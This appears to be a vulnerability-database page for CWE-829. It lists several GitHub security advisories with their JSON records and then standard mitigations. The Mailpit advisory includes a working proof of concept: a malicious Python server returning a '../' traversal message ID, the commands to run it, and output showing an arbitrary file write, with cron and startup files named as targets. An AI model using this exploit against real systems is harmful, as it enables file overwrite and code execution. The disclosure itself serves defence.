CWE-829
AllowedInclusion of Functionality from Untrusted Control Sphere
Abstraction: Base · Status: Incomplete
The product imports, requires, or includes executable functionality (such as a library) from a source that is outside of the intended control sphere.
393 vulnerabilities reference this CWE, most recent first.
GHSA-Q7W6-6G89-9GRW
Vulnerability from github – Published: 2026-01-06 18:31 – Updated: 2026-01-06 18:31Sony BRAVIA Digital Signage 1.7.8 contains a remote file inclusion vulnerability that allows attackers to inject arbitrary client-side scripts through the content material URL parameter. Attackers can exploit this vulnerability to hijack user sessions, execute cross-site scripting code, and modify display content by manipulating the input material type.
{
"affected": [],
"aliases": [
"CVE-2020-36924"
],
"database_specific": {
"cwe_ids": [
"CWE-829"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-01-06T16:15:48Z",
"severity": "MODERATE"
},
"details": "Sony BRAVIA Digital Signage 1.7.8 contains a remote file inclusion vulnerability that allows attackers to inject arbitrary client-side scripts through the content material URL parameter. Attackers can exploit this vulnerability to hijack user sessions, execute cross-site scripting code, and modify display content by manipulating the input material type.",
"id": "GHSA-q7w6-6g89-9grw",
"modified": "2026-01-06T18:31:35Z",
"published": "2026-01-06T18:31:35Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-36924"
},
{
"type": "WEB",
"url": "https://cxsecurity.com/issue/WLB-2020120030"
},
{
"type": "WEB",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/192605"
},
{
"type": "WEB",
"url": "https://packetstorm.news/files/id/160345"
},
{
"type": "WEB",
"url": "https://pro-bravia.sony.net"
},
{
"type": "WEB",
"url": "https://pro-bravia.sony.net/resources/software/bravia-signage"
},
{
"type": "WEB",
"url": "https://pro.sony/ue_US/products/display-software"
},
{
"type": "WEB",
"url": "https://www.exploit-db.com/exploits/49186"
},
{
"type": "WEB",
"url": "https://www.vulncheck.com/advisories/sony-bravia-digital-signage-unauthenticated-remote-file-inclusion"
},
{
"type": "WEB",
"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5612.php"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-QCJ9-WWGW-6GM8
Vulnerability from github – Published: 2026-04-03 02:47 – Updated: 2026-05-06 02:40Summary
Workspace .env can override the bundled plugin trust root
Current Maintainer Triage
- Status: open
- Normalized severity: high
- Assessment: v2026.3.28 still lets workspace .env override OPENCLAW_BUNDLED_PLUGINS_DIR, but critical is too high because exploitation still depends on attacker-controlled workspace loading, not a universal remote break.
Affected Packages / Versions
- Package:
openclaw(npm) - Latest published npm version:
2026.3.31 - Vulnerable version range:
<=2026.3.28 - Patched versions:
>= 2026.3.31 - First stable tag containing the fix:
v2026.3.31
Fix Commit(s)
330a9f98cb29c79b1c16a2117e03d6276a0d6289— 2026-03-31T19:25:12+09:00
OpenClaw thanks @nexrin for reporting.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 2026.3.28"
},
"package": {
"ecosystem": "npm",
"name": "openclaw"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2026.3.31"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-41396"
],
"database_specific": {
"cwe_ids": [
"CWE-15",
"CWE-829"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-03T02:47:57Z",
"nvd_published_at": "2026-04-28T19:37:43Z",
"severity": "HIGH"
},
"details": "## Summary\nWorkspace `.env` can override the bundled plugin trust root\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: high\n- Assessment: v2026.3.28 still lets workspace .env override OPENCLAW_BUNDLED_PLUGINS_DIR, but critical is too high because exploitation still depends on attacker-controlled workspace loading, not a universal remote break.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `\u003c=2026.3.28`\n- Patched versions: `\u003e= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `330a9f98cb29c79b1c16a2117e03d6276a0d6289` \u2014 2026-03-31T19:25:12+09:00\n\nOpenClaw thanks @nexrin for reporting.",
"id": "GHSA-qcj9-wwgw-6gm8",
"modified": "2026-05-06T02:40:28Z",
"published": "2026-04-03T02:47:57Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-qcj9-wwgw-6gm8"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41396"
},
{
"type": "WEB",
"url": "https://github.com/openclaw/openclaw/commit/330a9f98cb29c79b1c16a2117e03d6276a0d6289"
},
{
"type": "PACKAGE",
"url": "https://github.com/openclaw/openclaw"
},
{
"type": "WEB",
"url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"
},
{
"type": "WEB",
"url": "https://www.vulncheck.com/advisories/openclaw-environment-variable-override-of-plugin-trust-root"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "OpenClaw: Workspace `.env` can override the bundled plugin trust root"
}
GHSA-QGPP-6944-9QQM
Vulnerability from github – Published: 2022-05-24 19:08 – Updated: 2022-05-24 19:08iDrive RemotePC before 7.6.48 on Windows allows privilege escalation. A local and low-privileged user can force RemotePC to execute an attacker-controlled executable with SYSTEM privileges.
{
"affected": [],
"aliases": [
"CVE-2021-34692"
],
"database_specific": {
"cwe_ids": [
"CWE-829"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-07-15T14:15:00Z",
"severity": "HIGH"
},
"details": "iDrive RemotePC before 7.6.48 on Windows allows privilege escalation. A local and low-privileged user can force RemotePC to execute an attacker-controlled executable with SYSTEM privileges.",
"id": "GHSA-qgpp-6944-9qqm",
"modified": "2022-05-24T19:08:12Z",
"published": "2022-05-24T19:08:12Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-34692"
},
{
"type": "WEB",
"url": "https://raw.githubusercontent.com/jacob-baines/vuln_disclosure/main/vuln_2021_01.txt"
},
{
"type": "WEB",
"url": "https://www.remotepc.com/release-info"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-QH9P-7GFQ-6XR8
Vulnerability from github – Published: 2022-05-13 01:43 – Updated: 2022-05-13 01:43A flaw in the IBM J9 VM class verifier allows untrusted code to disable the security manager and elevate its privileges. IBM X-Force ID: 126873.
{
"affected": [],
"aliases": [
"CVE-2017-1376"
],
"database_specific": {
"cwe_ids": [
"CWE-829"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2017-08-29T01:35:00Z",
"severity": "CRITICAL"
},
"details": "A flaw in the IBM J9 VM class verifier allows untrusted code to disable the security manager and elevate its privileges. IBM X-Force ID: 126873.",
"id": "GHSA-qh9p-7gfq-6xr8",
"modified": "2022-05-13T01:43:15Z",
"published": "2022-05-13T01:43:15Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2017-1376"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2017:2469"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2017:2481"
},
{
"type": "WEB",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/126873"
},
{
"type": "WEB",
"url": "http://www.ibm.com/support/docview.wss?uid=swg22007305\u0026myns=swgtiv\u0026mynp=OCSSJQQ3\u0026mync=E\u0026cm_sp=swgtiv-_-OCSSJQQ3-_-E"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-QJRX-W3XM-C4FJ
Vulnerability from github – Published: 2025-10-06 18:31 – Updated: 2025-10-06 18:31IBM Security Verify Access and IBM Security Verify Access Docker 10.0.0.0 through 10.0.9.0 and 11.0.0.0 through 11.0.1.0
could allow a locally authenticated user to execute malicious scripts from outside of its control sphere.
{
"affected": [],
"aliases": [
"CVE-2025-36355"
],
"database_specific": {
"cwe_ids": [
"CWE-829"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-10-06T17:16:05Z",
"severity": "HIGH"
},
"details": "IBM Security Verify Access and IBM Security Verify Access Docker 10.0.0.0 through 10.0.9.0 and 11.0.0.0 through 11.0.1.0 \n\ncould allow a locally authenticated user to execute malicious scripts from outside of its control sphere.",
"id": "GHSA-qjrx-w3xm-c4fj",
"modified": "2025-10-06T18:31:06Z",
"published": "2025-10-06T18:31:06Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-36355"
},
{
"type": "WEB",
"url": "https://www.ibm.com/support/pages/node/7247215"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L",
"type": "CVSS_V3"
}
]
}
GHSA-QM34-9R78-66CQ
Vulnerability from github – Published: 2024-10-18 15:31 – Updated: 2025-10-22 00:33ScienceLogic SL1 (formerly EM7) is affected by an unspecified vulnerability involving an unspecified third-party component packaged with SL1. The vulnerability is addressed in SL1 versions 12.1.3+, 12.2.3+, and 12.3+. Remediations have been made available for all SL1 versions back to version lines 10.1.x, 10.2.x, 11.1.x, 11.2.x, and 11.3.x.
{
"affected": [],
"aliases": [
"CVE-2024-9537"
],
"database_specific": {
"cwe_ids": [
"CWE-829"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-10-18T15:15:04Z",
"severity": "CRITICAL"
},
"details": "ScienceLogic SL1 (formerly EM7) is affected by an unspecified vulnerability involving an unspecified third-party component packaged with SL1. The vulnerability is addressed in SL1 versions 12.1.3+, 12.2.3+, and 12.3+. Remediations have been made available for all SL1 versions back to version lines 10.1.x, 10.2.x, 11.1.x, 11.2.x, and 11.3.x.",
"id": "GHSA-qm34-9r78-66cq",
"modified": "2025-10-22T00:33:10Z",
"published": "2024-10-18T15:31:20Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-9537"
},
{
"type": "WEB",
"url": "https://arcticwolf.com/resources/blog/rackspace-breach-linked-to-zero-day-vulnerability-sciencelogic-sl1s-third-party-utility"
},
{
"type": "WEB",
"url": "https://community.sciencelogic.com/blog/latest-kb-articles-and-known-issues-blog-board/week-of-september-30-2024---latest-kb-articles-and-known-issues-part-1-of-2/1690"
},
{
"type": "WEB",
"url": "https://rackspace.service-now.com/system_status?id=detailed_status\u0026service=4dafca5a87f41610568b206f8bbb35a6"
},
{
"type": "WEB",
"url": "https://support.sciencelogic.com/s/article/15465"
},
{
"type": "WEB",
"url": "https://support.sciencelogic.com/s/article/15527"
},
{
"type": "WEB",
"url": "https://twitter.com/ynezzor/status/1839931641172467907"
},
{
"type": "WEB",
"url": "https://www.bleepingcomputer.com/news/security/rackspace-monitoring-data-stolen-in-sciencelogic-zero-day-attack"
},
{
"type": "WEB",
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2024-9537"
},
{
"type": "WEB",
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?search_api_fulltext=CVE-2024-9537"
},
{
"type": "WEB",
"url": "https://www.theregister.com/2024/09/30/rackspace_zero_day_attack"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:Red",
"type": "CVSS_V4"
}
]
}
GHSA-QPCC-2CCJ-GP68
Vulnerability from github – Published: 2026-03-17 21:31 – Updated: 2026-03-17 21:31Improper trust boundary enforcement in Kiro IDE before version 0.8.0 on all supported platforms might allow a remote unauthenticated threat actor to execute arbitrary code via maliciously crafted project directory files that bypass workspace trust protections when a local user opens the directory.
To remediate this issue, users should upgrade to version 0.8.0 or higher.
{
"affected": [],
"aliases": [
"CVE-2026-4295"
],
"database_specific": {
"cwe_ids": [
"CWE-829"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-03-17T20:16:14Z",
"severity": "HIGH"
},
"details": "Improper trust boundary enforcement in Kiro IDE before version 0.8.0 on all supported platforms might allow a remote unauthenticated threat actor to execute arbitrary code via maliciously crafted project directory files that bypass workspace trust protections when a local user opens the directory.\n\n\n\nTo remediate this issue, users should upgrade to version 0.8.0 or higher.",
"id": "GHSA-qpcc-2ccj-gp68",
"modified": "2026-03-17T21:31:46Z",
"published": "2026-03-17T21:31:46Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4295"
},
{
"type": "WEB",
"url": "https://aws.amazon.com/security/security-bulletins/2026-009-AWS"
},
{
"type": "WEB",
"url": "https://kiro.dev/changelog/ide/0-8"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-QRJG-CMWM-3465
Vulnerability from github – Published: 2024-10-28 15:31 – Updated: 2026-04-01 18:32Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in BuyNowDepot Advanced Online Ordering and Delivery Platform allows PHP Local File Inclusion.This issue affects Advanced Online Ordering and Delivery Platform: from n/a through 2.0.0.
{
"affected": [],
"aliases": [
"CVE-2024-50497"
],
"database_specific": {
"cwe_ids": [
"CWE-829",
"CWE-98"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-10-28T13:15:07Z",
"severity": "HIGH"
},
"details": "Improper Control of Filename for Include/Require Statement in PHP Program (\u0027PHP Remote File Inclusion\u0027) vulnerability in BuyNowDepot Advanced Online Ordering and Delivery Platform allows PHP Local File Inclusion.This issue affects Advanced Online Ordering and Delivery Platform: from n/a through 2.0.0.",
"id": "GHSA-qrjg-cmwm-3465",
"modified": "2026-04-01T18:32:10Z",
"published": "2024-10-28T15:31:14Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-50497"
},
{
"type": "WEB",
"url": "https://patchstack.com/database/Wordpress/Plugin/advanced-online-ordering-and-delivery-platform/vulnerability/wordpress-advanced-online-ordering-and-delivery-platform-plugin-2-0-0-local-file-inclusion-vulnerability?_s_id=cve"
},
{
"type": "WEB",
"url": "https://patchstack.com/database/vulnerability/advanced-online-ordering-and-delivery-platform/wordpress-advanced-online-ordering-and-delivery-platform-plugin-2-0-0-local-file-inclusion-vulnerability?_s_id=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-QX5X-85P8-VG4J
Vulnerability from github – Published: 2026-05-19 15:53 – Updated: 2026-05-19 15:53Summary
The mailpit dump --http sub-command downloads every message from a remote Mailpit instance and writes each one as .eml inside the user-supplied output directory. The message ID field is taken verbatim from the JSON response of the remote server and concatenated into the output path with path.Join, which silently normalizes .. segments. A malicious HTTP server impersonating Mailpit can therefore make mailpit dump write attacker-controlled bytes to any path the running user can write, fully outside the intended output directory.
Details
Anyone who can convince a user to run mailpit dump --http (typosquat, phishing tutorial, MITM of a plain-http:// Mailpit, or a compromised internal Mailpit they back up regularly) obtains an arbitrary file write primitive as the dumping user. Realistic post-exploitation includes overwriting init/cron files, shell startup files, CI artifact upload targets, web roots, etc. — anything the dumping user can write to, with attacker-controlled file bytes and a .eml filename suffix.
Affected code
path.Join("/safe/out/dir", "../../../../etc/cron.d/payload.eml") resolves to /etc/cron.d/payload.eml — the .. segments are normalized, not rejected. The remote server controls both m.ID (path) and the body of /api/v1/message//raw (contents). There is no filepath.Rel(outDir, out) containment check, no allow-list on m.ID characters, and no body-size cap.
The underlying cause is that the command was added to back up a trusted Mailpit, but the trust model on the wire never gets validated — the operator only supplies a URL.
PoC
- Run a malicious "Mailpit" server that returns one message whose ID contains .. segments:
# evil-mailpit.py
import http.server, json
class Evil(http.server.BaseHTTPRequestHandler):
def do_GET(self):
if "/api/v1/messages" in self.path:
resp = {
"total": 1, "unread": 0, "count": 1,
"messages_count": 1, "messages_unread": 0,
"start": 0, "tags": [],
"messages": [{
"ID": "../../../../tmp/mailpit-pwn", # ← traversal
"MessageID": "x", "Read": False,
"From": {"Name": "", "Address": "a@b"},
"To": [{"Name": "", "Address": "c@d"}],
"Cc": None, "Bcc": None, "ReplyTo": [],
"Subject": "evil",
"Created": "2026-01-01T00:00:00Z",
"Tags": [], "Size": 5,
"Attachments": 0, "Snippet": ""
}]
}
body = json.dumps(resp).encode()
ctype = "application/json"
elif "/raw" in self.path:
body = b"PWNED BY MAILPIT DUMP TRAVERSAL\n"
ctype = "text/plain"
else:
self.send_response(404); self.end_headers(); return
self.send_response(200)
self.send_header("Content-Type", ctype)
self.send_header("Content-Length", str(len(body)))
self.end_headers()
self.wfile.write(body)
http.server.HTTPServer(("127.0.0.1", 19090), Evil).serve_forever()
$ python3 evil-mailpit.py &
$ mkdir -p /tmp/dump-out
$ mailpit dump --http http://127.0.0.1:19090/ /tmp/dump-out
- Observe the file was written outside the requested output directory:
$ ls -la /tmp/dump-out/ /tmp/mailpit-pwn.eml
/tmp/dump-out/ ← empty
total 0
-rw-r--r-- 1 user user 31 May 11 16:16 /tmp/mailpit-pwn.eml
$ cat /tmp/mailpit-pwn.eml
PWNED BY MAILPIT DUMP TRAVERSAL
The same primitive trivially targets ~/.config/autostart/*.eml, ~/.bash_logout.eml (where it overwrites if symlinked), CI artifact dirs that ingest every file, or via long ../ chains any absolute path the user can write to.
Impact
Arbitrary file write via path traversal in mailpit dump --http, allowing a malicious Mailpit-compatible server to force writes outside the intended output directory. This can lead to overwriting sensitive files (e.g. cron jobs, CI artifacts, shell configs) and potential code execution depending on write location and privileges.
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/axllent/mailpit"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.30.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-45711"
],
"database_specific": {
"cwe_ids": [
"CWE-22",
"CWE-829"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-19T15:53:09Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
"details": "### Summary\nThe mailpit dump --http \u003cbase-url\u003e \u003cout-dir\u003e sub-command downloads every message from a remote Mailpit instance and writes each one as \u003cid\u003e.eml inside the user-supplied output directory. The message ID field is taken verbatim from the JSON response of the remote server and concatenated into the output path with path.Join, which silently normalizes .. segments. A malicious HTTP server impersonating Mailpit can therefore make mailpit dump write attacker-controlled bytes to any path the running user can write, fully outside the intended output directory.\n\n### Details\nAnyone who can convince a user to run mailpit dump --http \u003cattacker-url\u003e \u003cdir\u003e (typosquat, phishing tutorial, MITM of a plain-http:// Mailpit, or a compromised internal Mailpit they back up regularly) obtains an arbitrary file write primitive as the dumping user. Realistic post-exploitation includes overwriting init/cron files, shell startup files, CI artifact upload targets, web roots, etc. \u2014 anything the dumping user can write to, with attacker-controlled file bytes and a .eml filename suffix.\n\n### Affected code\n[internal/dump/dump.go](https://github.com/axllent/mailpit/blob/develop/internal/dump/dump.go#L118-L155):\n\npath.Join(\"/safe/out/dir\", \"../../../../etc/cron.d/payload.eml\") resolves to /etc/cron.d/payload.eml \u2014 the .. segments are normalized, not rejected. The remote server controls both m.ID (path) and the body of /api/v1/message/\u003cid\u003e/raw (contents). There is no filepath.Rel(outDir, out) containment check, no allow-list on m.ID characters, and no body-size cap.\n\nThe underlying cause is that the command was added to back up a trusted Mailpit, but the trust model on the wire never gets validated \u2014 the operator only supplies a URL.\n\n### PoC\n\n1. Run a malicious \"Mailpit\" server that returns one message whose ID contains .. segments:\n\n```python\n# evil-mailpit.py\nimport http.server, json\n\nclass Evil(http.server.BaseHTTPRequestHandler):\n def do_GET(self):\n if \"/api/v1/messages\" in self.path:\n resp = {\n \"total\": 1, \"unread\": 0, \"count\": 1,\n \"messages_count\": 1, \"messages_unread\": 0,\n \"start\": 0, \"tags\": [],\n \"messages\": [{\n \"ID\": \"../../../../tmp/mailpit-pwn\", # \u2190 traversal\n \"MessageID\": \"x\", \"Read\": False,\n \"From\": {\"Name\": \"\", \"Address\": \"a@b\"},\n \"To\": [{\"Name\": \"\", \"Address\": \"c@d\"}],\n \"Cc\": None, \"Bcc\": None, \"ReplyTo\": [],\n \"Subject\": \"evil\",\n \"Created\": \"2026-01-01T00:00:00Z\",\n \"Tags\": [], \"Size\": 5,\n \"Attachments\": 0, \"Snippet\": \"\"\n }]\n }\n body = json.dumps(resp).encode()\n ctype = \"application/json\"\n elif \"/raw\" in self.path:\n body = b\"PWNED BY MAILPIT DUMP TRAVERSAL\\n\"\n ctype = \"text/plain\"\n else:\n self.send_response(404); self.end_headers(); return\n\n self.send_response(200)\n self.send_header(\"Content-Type\", ctype)\n self.send_header(\"Content-Length\", str(len(body)))\n self.end_headers()\n self.wfile.write(body)\n\nhttp.server.HTTPServer((\"127.0.0.1\", 19090), Evil).serve_forever()\n```\n\n```\n$ python3 evil-mailpit.py \u0026\n$ mkdir -p /tmp/dump-out\n$ mailpit dump --http http://127.0.0.1:19090/ /tmp/dump-out\n```\n\n2. Observe the file was written outside the requested output directory:\n\n```\n$ ls -la /tmp/dump-out/ /tmp/mailpit-pwn.eml\n/tmp/dump-out/ \u2190 empty\ntotal 0\n-rw-r--r-- 1 user user 31 May 11 16:16 /tmp/mailpit-pwn.eml\n$ cat /tmp/mailpit-pwn.eml\nPWNED BY MAILPIT DUMP TRAVERSAL\n```\n\nThe same primitive trivially targets ~/.config/autostart/*.eml, ~/.bash_logout.eml (where it overwrites if symlinked), CI artifact dirs that ingest every file, or via long ../ chains any absolute path the user can write to.\n\n### Impact\nArbitrary file write via path traversal in mailpit dump --http, allowing a malicious Mailpit-compatible server to force writes outside the intended output directory. This can lead to overwriting sensitive files (e.g. cron jobs, CI artifacts, shell configs) and potential code execution depending on write location and privileges.",
"id": "GHSA-qx5x-85p8-vg4j",
"modified": "2026-05-19T15:53:09Z",
"published": "2026-05-19T15:53:09Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/axllent/mailpit/security/advisories/GHSA-qx5x-85p8-vg4j"
},
{
"type": "PACKAGE",
"url": "https://github.com/axllent/mailpit"
},
{
"type": "WEB",
"url": "https://github.com/axllent/mailpit/releases/tag/v1.30.0"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:L",
"type": "CVSS_V3"
}
],
"summary": "Mailpit: Path traversal \u0026 arbitrary file write in mailpit dump --http via attacker-controlled message IDs"
}
GHSA-R23F-C2J5-RX2F
Vulnerability from github – Published: 2020-06-03 21:58 – Updated: 2021-03-04 18:20Impact
An attacker can exploit this vulnerability to read local files of an October CMS server. The vulnerability is only exploitable by an authenticated backend user with the cms.manage_assets permission.
Patches
Issue has been patched in Build 466 (v1.0.466).
Workarounds
Apply https://github.com/octobercms/october/commit/2b8939cc8b5b6fe81e093fe2c9f883ada4e3c8cc to your installation manually if unable to upgrade to Build 466.
References
Reported by Sivanesh Ashok
For more information
If you have any questions or comments about this advisory: * Email us at hello@octobercms.com
Threat assessment:

{
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "october/cms"
},
"ranges": [
{
"events": [
{
"introduced": "1.0.319"
},
{
"fixed": "1.0.466"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2020-5295"
],
"database_specific": {
"cwe_ids": [
"CWE-829",
"CWE-98"
],
"github_reviewed": true,
"github_reviewed_at": "2020-06-03T21:23:15Z",
"nvd_published_at": "2020-06-03T22:15:00Z",
"severity": "MODERATE"
},
"details": "### Impact\nAn attacker can exploit this vulnerability to read local files of an October CMS server. The vulnerability is only exploitable by an authenticated backend user with the `cms.manage_assets` permission.\n\n### Patches\nIssue has been patched in Build 466 (v1.0.466).\n\n### Workarounds\nApply https://github.com/octobercms/october/commit/2b8939cc8b5b6fe81e093fe2c9f883ada4e3c8cc to your installation manually if unable to upgrade to Build 466.\n\n### References\nReported by [Sivanesh Ashok](https://stazot.com/)\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Email us at [hello@octobercms.com](mailto:hello@octobercms.com)\n\n### Threat assessment:\n\u003cimg width=\"1108\" alt=\"Screen Shot 2020-03-31 at 2 37 53 PM\" src=\"https://user-images.githubusercontent.com/7253840/78072989-44b3ac80-735d-11ea-8676-09c69f0409c4.png\"\u003e",
"id": "GHSA-r23f-c2j5-rx2f",
"modified": "2021-03-04T18:20:28Z",
"published": "2020-06-03T21:58:16Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/octobercms/october/security/advisories/GHSA-r23f-c2j5-rx2f"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-5295"
},
{
"type": "WEB",
"url": "https://github.com/octobercms/october/commit/2b8939cc8b5b6fe81e093fe2c9f883ada4e3c8cc"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/158730/October-CMS-Build-465-XSS-File-Read-File-Deletion-CSV-Injection.html"
},
{
"type": "WEB",
"url": "http://seclists.org/fulldisclosure/2020/Aug/2"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "Local File read vulnerability in OctoberCMS"
}
Mitigation MIT-4
Strategy: Libraries or Frameworks
Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid [REF-1482].
Mitigation MIT-21.1
Strategy: Enforcement by Conversion
- When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs.
- For example, ID 1 could map to "inbox.txt" and ID 2 could map to "profile.txt". Features such as the ESAPI AccessReferenceMap [REF-45] provide this capability.
Mitigation MIT-15
For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.
Mitigation MIT-22
Strategy: Sandbox or Jail
- Run the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software.
- OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations.
- This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise.
- Be careful to avoid CWE-243 and other weaknesses related to jails.
Mitigation MIT-17
Strategy: Environment Hardening
Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations.
Mitigation MIT-5.1
Strategy: Input Validation
- Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.
- When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue."
- Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
- When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single "." character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as "/" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434.
